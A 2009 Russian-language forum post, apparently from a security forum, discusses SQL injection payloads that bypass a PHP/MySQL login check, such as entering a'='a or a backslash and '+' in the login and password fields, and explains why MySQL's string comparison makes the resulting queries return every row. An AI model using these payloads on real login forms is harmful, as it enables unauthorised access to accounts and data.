03.09.2009, 20:57
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
Сообщение от Gifts
ElteRUS Эээ, в рот мне ноги, я не понимаю почему это работает, но, ведь, работает
Код:
?login=\&password=%2B'
Хм, да это то, только своеобразно оформлено но сути не меняет, твой вариант даже круче ))
Я рассчитывал на такое:
Логин '='
Пароль '='
Либо так a'='a в логин и пароль. Давайте посмотрим на получившиеся запрос:
PHP код:
select * from `admin` where login = 'a'='a' and password = 'a'='a'
Такой запрос прокатит. Выполните у себя на локалхосте
PHP код:
Select * from mysql.user where user = 'a'='a';
Выведутся все записи таблицы. Ну тот факт, что mysql поддерживает прямое сравнение строк – известен. Но дальше круче )) Выполните такое
PHP код:
Select * from mysq.user where user = 'aasdfsdf'='usu';
И это прокатит. Хотя очевидно, что эти строки не равны.
Твой пример из той же оперы
Код:
select * from `admin` where login = '\' and password = '%2B''
Только здесь видно что кроме = может быть и +, а так же * - )))
|
|
|